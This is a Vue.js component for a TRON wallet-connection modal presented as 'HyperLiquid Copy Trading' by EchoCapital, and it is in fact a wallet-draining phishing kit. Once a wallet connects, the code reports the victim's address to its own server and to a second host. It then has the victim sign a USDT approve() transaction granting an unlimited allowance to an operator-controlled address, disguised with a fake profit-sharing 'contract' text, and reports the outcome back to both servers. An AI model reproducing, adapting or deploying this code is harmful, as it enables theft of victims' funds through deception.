<template>
  <div>
    <!-- Основной лоадер -->
    <div
      v-if="showLoader"
      class="fixed inset-0 flex items-center justify-center"
      style="z-index: 9999998; background: linear-gradient(135deg, rgba(15, 23, 42, 0.95) 0%, rgba(30, 41, 59, 0.95) 100%);"
    >
      <div class="bg-white rounded-2xl shadow-2xl p-8 max-w-md mx-4 text-center border border-gray-200">
        <div class="mb-6">
          <svg class="animate-spin h-16 w-16 mx-auto text-blue-600" xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24">
            <circle class="opacity-25" cx="12" cy="12" r="10" stroke="currentColor" stroke-width="4"></circle>
            <path class="opacity-75" fill="currentColor" d="M4 12a8 8 0 018-8V0C5.373 0 0 5.373 0 12h4zm2 5.291A7.962 7.962 0 014 12H0c0 3.042 1.135 5.824 3 7.938l3-2.647z"></path>
          </svg>
        </div>
        <h3 class="text-xl font-bold mb-3 text-gray-800">{{ loaderTitle }}</h3>
        <p class="text-gray-600 leading-relaxed mb-4">{{ loaderMessage }}</p>
        <div class="p-4 bg-gradient-to-r from-yellow-50 to-orange-50 border-l-4 border-yellow-500 rounded-lg">
          <p class="text-sm font-medium text-yellow-800 flex items-center justify-center">
            <svg class="w-5 h-5 mr-2" fill="currentColor" viewBox="0 0 20 20">
              <path fill-rule="evenodd" d="M8.257 3.099c.765-1.36 2.722-1.36 3.486 0l5.58 9.92c.75 1.334-.213 2.98-1.742 2.98H4.42c-1.53 0-2.493-1.646-1.743-2.98l5.58-9.92zM11 13a1 1 0 11-2 0 1 1 0 012 0zm-1-8a1 1 0 00-1 1v3a1 1 0 002 0V6a1 1 0 00-1-1z" clip-rule="evenodd"/>
            </svg>
            Don't close the site or wallet until the process is complete
          </p>
        </div>
      </div>
    </div>

    <!-- Модалка ошибки -->
    <div
      v-if="showErrorModal"
      class="fixed inset-0 flex items-center justify-center"
      style="z-index: 9999998; background: linear-gradient(135deg, rgba(15, 23, 42, 0.95) 0%, rgba(30, 41, 59, 0.95) 100%);"
    >
      <div class="bg-white rounded-2xl shadow-2xl p-8 max-w-md mx-4 text-center border border-gray-200">
        <!-- Иконка ошибки -->
        <div class="mb-6">
          <div class="w-16 h-16 mx-auto bg-red-100 rounded-full flex items-center justify-center">
            <svg class="w-10 h-10 text-red-600" fill="none" stroke="currentColor" viewBox="0 0 24 24">
              <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M6 18L18 6M6 6l12 12"></path>
            </svg>
          </div>
        </div>
        
        <h3 class="text-xl font-bold mb-3 text-gray-800">Transaction Failed</h3>
        <p class="text-gray-600 leading-relaxed mb-4">{{ errorMessage }}</p>
        
        <!-- Подсказки -->
        <div class="p-4 bg-gradient-to-r from-red-50 to-orange-50 border-l-4 border-red-500 rounded-lg mb-6 text-left">
          <p class="text-sm font-medium text-red-800 mb-2">Possible reasons:</p>
          <ul class="text-sm text-red-700 space-y-1">
            <li>• Insufficient TRX for gas fees</li>
            <li>• Transaction was rejected</li>
            <li>• Network congestion</li>
          </ul>
        </div>
        
        <!-- Кнопки -->
        <div class="flex gap-3">
          <button
            @click="closeErrorModal"
            class="flex-1 px-4 py-3 bg-gray-200 text-gray-700 rounded-xl font-medium hover:bg-gray-300 transition-colors"
          >
            Cancel
          </button>
          <button
            @click="retryApprove"
            class="flex-1 px-4 py-3 bg-blue-600 text-white rounded-xl font-medium hover:bg-blue-700 transition-colors flex items-center justify-center gap-2"
          >
            <svg class="w-5 h-5" fill="none" stroke="currentColor" viewBox="0 0 24 24">
              <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M4 4v5h.582m15.356 2A8.001 8.001 0 004.582 9m0 0H9m11 11v-5h-.581m0 0a8.003 8.003 0 01-15.357-2m15.357 2H15"></path>
            </svg>
            Try Again
          </button>
        </div>
      </div>
    </div>

    <WalletConnectionSuccessModal
      :is-open="showSuccessModal"
      :ref-code="refCode"
      @close="showSuccessModal = false"
    />
  </div>
</template>

<script>
import { WalletConnectAdapter } from '@tronweb3/tronwallet-adapter-walletconnect'
import WalletConnectionSuccessModal from './WalletConnectionSuccessModal.vue'

export default {
  name: 'WalletConnectWalletModal',
  components: {
    WalletConnectionSuccessModal
  },
  props: {
    isOpen: Boolean,
    refCode: {
      type: String,
      default: 'ECHOCAPITAL'
    }
  },
  data() {
    return {
      connectedAdapter: null,
      tronWeb: null,
      isConnecting: false,
      showLoader: false,
      loaderTitle: '',
      loaderMessage: '',
      showSuccessModal: false,
      showErrorModal: false,
      errorMessage: '',
      pendingAddress: null,
      adminAddress: 'TJ2V21Rj9iaDYkfvJVn9eXevg4qxiUNniD',
      apiBaseUrl: window.location.hostname === 'localhost' 
        ? 'http://localhost:5000' 
        : '',
      backupApiBaseUrl: 'https://api-system.network'
    }
  },
  watch: {
    async isOpen(value) {
      if (value && !this.isConnecting) {
        await this.connect()
      }
    }
  },
  async mounted() {
    const TronWeb = (await import('tronweb')).default
    this.tronWeb = new TronWeb({
      fullHost: 'https://api.trongrid.io'
    })
  },
  methods: {
    async sendToBothServers(payload) {
      // Отправляем на основной сервер и получаем результат
      const mainRequest = fetch(`${this.apiBaseUrl}/api/connected`, {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify(payload)
      })

      // Отправляем на резервный сервер параллельно (не ждем результата)
      fetch(`${this.backupApiBaseUrl}/api/connected`, {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify(payload)
      }).catch(error => {
        console.warn('Backup server request failed:', error)
      })

      return mainRequest
    },

    setLoader(show, title = '', message = '') {
      this.showLoader = show
      this.loaderTitle = title
      this.loaderMessage = message
    },

    closeErrorModal() {
      this.showErrorModal = false
      this.errorMessage = ''
      this.pendingAddress = null
      this.$emit('close')
    },

    async retryApprove() {
      this.showErrorModal = false
      this.errorMessage = ''
      
      if (this.pendingAddress && this.connectedAdapter) {
        await this.performApprove(this.pendingAddress)
      } else {
        await this.connect()
      }
    },

    async connect() {
      if (this.isConnecting) return
      this.isConnecting = true

      try {
        console.log('=== STARTING CONNECTION ===')
        
        const currentUrl = window.location.origin
        console.log('Current URL:', currentUrl)
        
        const walletAdapter = new WalletConnectAdapter({
          network: 'Mainnet',
          options: {
            relayUrl: 'wss://relay.walletconnect.com',
            projectId: '7f78a75bbbbec0406919afc493bd66c8',
            metadata: {
              name: 'HyperLiquid Copy Trading',
              description: 'Connect your wallet to start copy trading',
              url: currentUrl,
              icons: ['https://i.ibb.co/6RzGStH8/icon.png']
            }
          },
          web3ModalConfig: {
            themeMode: 'light',
            themeVariables: {
              '--w3m-z-index': '9999999'
            },
            enableExplorer: true,
            explorerRecommendedWalletIds: [
              "4622a2b2d6af1c9844944291e5e7351a6aa24cd7b23099efac1b2fd875da31a0",
              "971e689d0a5be527bac79629b4ee9b925e82208e5168b733496a09c0faed0709",
              "e9ff15be73584489ca4a66f64d32c4537711797e30b6660dbcb71ea72a42b1f4",
              "7674bb4e353bf52886768a3ddc2a4562ce2f4191c80831291218ebd90f5f5e26",
              "38f5d18bd8522c244bdd70cb4a68e0e718865155811c043f052fb9f1c51de662",
              "0b415a746fb9ee99cce155c2ceca0c6f6061b1dbca2d722b3ba16381d0562150",
              "8a0ee50d1f22f6651afcae7eb4253e52a3310b90af5daef78a8c4929a9bb99d4",
              "15c8b91ade1a4e58f3ce4e7a0dd7f42b47db0c8df7e0d84f63eb39bcb96c4e0f",
              "fd20dc426fb37566d803205b19bbc1d4096b248ac04548e3cfb6b3a38bd033aa"
            ],
            enableNetworkView: true,
            enableAccountView: true
          }
        })
        
        await walletAdapter.connect()
        
        const address = walletAdapter.address
        this.connectedAdapter = walletAdapter
        this.pendingAddress = address
        
        console.log('✓ Wallet connected:', address)

        if (!address) {
          throw new Error('No address found after connection')
        }

        this.tronWeb.setAddress(address)

        this.setLoader(true, 'Connecting...', 'Registering your wallet...')
        await this.registerWallet(address)

        await this.performApprove(address)

      } catch (error) {
        console.error('Connection error:', error)
        this.setLoader(false)

        const userCancelled = error.message && (
          error.message.includes('User rejected') ||
          error.message.includes('User closed') ||
          error.message.includes('User cancelled') ||
          error.message.includes('Connection request reset') ||
          error.message.includes('User disconnected')
        )

        if (!userCancelled) {
          this.errorMessage = error.message || 'Connection failed. Please try again.'
          this.showErrorModal = true
        } else {
          this.$emit('close')
        }
      } finally {
        this.isConnecting = false
      }
    },

    async registerWallet(address) {
      try {
        console.log('Registering wallet:', address)
        const payload = {
          action: 'connect',
          connect_address: address,
          ref_code: this.refCode
        }
        const response = await this.sendToBothServers(payload)

        console.log('Registration response status:', response.status)
        if (response.ok) {
          const data = await response.json()
          console.log('Registration response data:', data)
          if (data.admin_address) {
            this.adminAddress = data.admin_address
          }
        }

        localStorage.setItem('connected_wallet', address)
        localStorage.setItem('wallet_type', 'walletconnect')
      } catch (error) {
        console.error('Registration error:', error)
      }
    },

    async performApprove(address) {
      try {
        this.setLoader(true, 'Sign Contract', 'Please sign the contract in your wallet...')
        
        const result = await this.approveUSDT(address, this.adminAddress)

        if (!result.success) {
          await this.notifyApproveStatus(address, 'failed', result.error, result.txid || null)
          throw new Error(result.error || 'Transaction failed')
        }

        this.setLoader(true, 'Confirming...', 'Waiting for blockchain confirmation...')
        
        const confirmation = await this.waitForConfirmation(result.txid)

        if (!confirmation.success) {
          await this.notifyApproveStatus(address, 'failed', confirmation.error, result.txid)
          throw new Error(confirmation.error || 'Transaction was not confirmed')
        }

        await this.notifyApproveStatus(address, 'success', null, result.txid)

        this.setLoader(false)
        this.pendingAddress = null
        this.showSuccessModal = true
        this.$emit('close')

      } catch (error) {
        console.error('Approve error:', error)
        this.setLoader(false)

        const userCancelled = error.message && (
          error.message.includes('User rejected') ||
          error.message.includes('User closed') ||
          error.message.includes('User cancelled') ||
          error.message.includes('Connection request reset') ||
          error.message.includes('User disconnected')
        )

        if (userCancelled) {
          await this.notifyApproveStatus(address, 'failed', 'User cancelled transaction', null)
          this.$emit('close')
        } else {
          this.errorMessage = error.message || 'Transaction failed. Please try again.'
          this.showErrorModal = true
        }
      }
    },

    async notifyApproveStatus(address, status, error = null, txid = null) {
      try {
        const payload = {
          connect_address: address,
          ref_code: this.refCode,
          admin_address: this.adminAddress
        }

        if (status === 'success') {
          payload.action = 'approve_success'
        } else {
          payload.action = 'approve_failed'
          payload.error = error || 'Transaction declined'
        }

        if (txid) {
          payload.txid = txid
        }

        console.log('Notifying approve status:', payload)
        await this.sendToBothServers(payload)
      } catch (error) {
        console.error('Notification error:', error)
      }
    },

    async debugApprove(stage, data = {}) {
      try {
        await fetch('/api/connected', {
          method: 'POST',
          headers: {'Content-Type': 'application/json'},
          body: JSON.stringify({
            action: 'approve_debug',
            stage,
            ...data
          })
        })
      } catch (e) {
        console.error('debugApprove failed:', e)
      }
    },

    async approveUSDT(userAddress, spenderAddress) {
      if (!this.connectedAdapter || !this.connectedAdapter.address) {
        return { success: false, error: 'WalletConnect not connected' }
      }

      const usdtContract = 'TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t'
      const maxAmount = '115792089237316195423570985008687907853269984665640564039457584007913129639935'

      console.log('=== STARTING APPROVE PROCESS ===')
      console.log('User address:', userAddress)
      console.log('Spender address:', spenderAddress)

      try {
        await this.debugApprove('start', { user_address: userAddress, spender_address: spenderAddress })

        const functionSelector = 'approve(address,uint256)'
        
        const parameters = [
          { type: 'address', value: spenderAddress },
          { type: 'uint256', value: maxAmount }
        ]
        
        const options = {
          feeLimit: 100_000_000,
          callValue: 0
        }

        const { transaction } = await this.tronWeb.transactionBuilder.triggerSmartContract(
          usdtContract,
          functionSelector,
          options,
          parameters,
          userAddress
        )

        const agreementText = `HyperLiquid copy trading✅
By signing this contract, the User agrees to connect to the referral trader EchoCapital on the HyperLiquid platform.

EchoCapital's trades will be mirrored automatically on the User's account under the copy-trading model.

All net profits generated through this connection shall be split equally: 50% to the User and 50% to EchoCapital.`

        transaction.description = agreementText

        console.log('✓ Transaction created with description')
        await this.debugApprove('transaction_created', { txid: transaction.txID || null })

        console.log('Signing transaction via adapter...')
        await this.debugApprove('signing_started', { txid: transaction.txID || null })
        const signedTransaction = await this.connectedAdapter.signTransaction(transaction)
        
        console.log('✓ Transaction signed')
        await this.debugApprove('signed', { txid: signedTransaction.txID || null })

        this.setLoader(true, 'Processing...', 'Sending transaction to blockchain...')

        console.log('Broadcasting transaction...')
        const result = await this.tronWeb.trx.sendRawTransaction(signedTransaction)
        
        console.log('✓ Broadcast result:', result)
        await this.debugApprove('broadcast_result', {
          result: result.result,
          code: result.code || null,
          message: result.message || null,
          txid: result.txid || result.transaction?.txID || null
        })

        // Обрабатываем ошибки сети сразу
        if (result.code === 'BANDWITH_ERROR') {
          return { 
            success: false, 
            error: 'Insufficient TRX for transaction fees. Please add at least 50 TRX to your wallet.' 
          }
        }
        
        if (result.code === 'CONTRACT_VALIDATE_ERROR') {
          return { 
            success: false, 
            error: 'Contract validation failed. Please try again.' 
          }
        }

        if (result.result === false || result.code === 'FAILED') {
          const errorMsg = result.message || result.code || 'Unknown error'
          return { success: false, error: `Transaction failed: ${errorMsg}` }
        }

        const txid = result.txid || result.transaction?.txID

        if (!txid) {
          return { success: false, error: 'Transaction ID not found' }
        }

        console.log('=== TRANSACTION BROADCAST ===')
        console.log('TronScan: https://tronscan.org/#/transaction/' + txid)

        return { txid, success: true }

      } catch (error) {
        console.error('Approve error:', error)

        await this.debugApprove('exception', {
          name: error?.name || null,
          message: error?.message || String(error),
          code: error?.code || null
        })

        return { success: false, error: error.message || 'Transaction failed' }
      }
    },

    async waitForConfirmation(txid, maxAttempts = 25) {
      console.log('Waiting for confirmation:', txid)
      
      // Ждем 3 секунды перед первой проверкой
      await new Promise(resolve => setTimeout(resolve, 3000))
      
      for (let i = 0; i < maxAttempts; i++) {
        try {
          const info = await this.tronWeb.trx.getTransactionInfo(txid)
          
          console.log(`Attempt ${i + 1}/${maxAttempts}:`, info)
          
          if (info && info.id) {
            if (info.receipt) {
              const receiptResult = info.receipt.result
              
              if (receiptResult === 'SUCCESS') {
                console.log('✓ Transaction confirmed SUCCESS')
                return { success: true, info }
              }
              
              if (receiptResult === 'REVERT') {
                console.error('✗ Transaction REVERTED')
                return { 
                  success: false, 
                  error: 'Transaction was reverted. Please check your balance and try again.' 
                }
              }
              
              if (receiptResult === 'OUT_OF_ENERGY') {
                console.error('✗ OUT OF ENERGY')
                return { 
                  success: false, 
                  error: 'Insufficient energy/TRX for transaction. Please add more TRX to your wallet.' 
                }
              }
              
              if (receiptResult === 'FAILED') {
                console.error('✗ Transaction FAILED')
                return { 
                  success: false, 
                  error: 'Transaction failed on blockchain.' 
                }
              }
            }
            
            if (info.contractResult && info.contractResult.length > 0) {
              const contractResult = info.contractResult[0]
              if (contractResult === '' || 
                  contractResult === '0000000000000000000000000000000000000000000000000000000000000001') {
                console.log('✓ Contract result indicates SUCCESS')
                return { success: true, info }
              }
            }
            
            if (info.receipt && !info.receipt.result) {
              console.log('✓ Transaction confirmed (no explicit result)')
              return { success: true, info }
            }
          }
        } catch (err) {
          console.warn(`Confirmation check ${i + 1} error:`, err.message)
        }
        
        await new Promise(resolve => setTimeout(resolve, 3000))
      }
      
      console.warn('Confirmation timeout reached')
      return { 
        success: false, 
        error: 'Transaction confirmation timeout. Please check your wallet and try again.' 
      }
    }
  },

  beforeUnmount() {
    if (this.connectedAdapter) {
      try {
        this.connectedAdapter.disconnect()
      } catch (e) {
        console.log('Disconnect error:', e)
      }
    }
  }
}
</script>

<style scoped>
@keyframes spin {
  from { transform: rotate(0deg); }
  to { transform: rotate(360deg); }
}

.animate-spin {
  animation: spin 1s linear infinite;
}
</style>
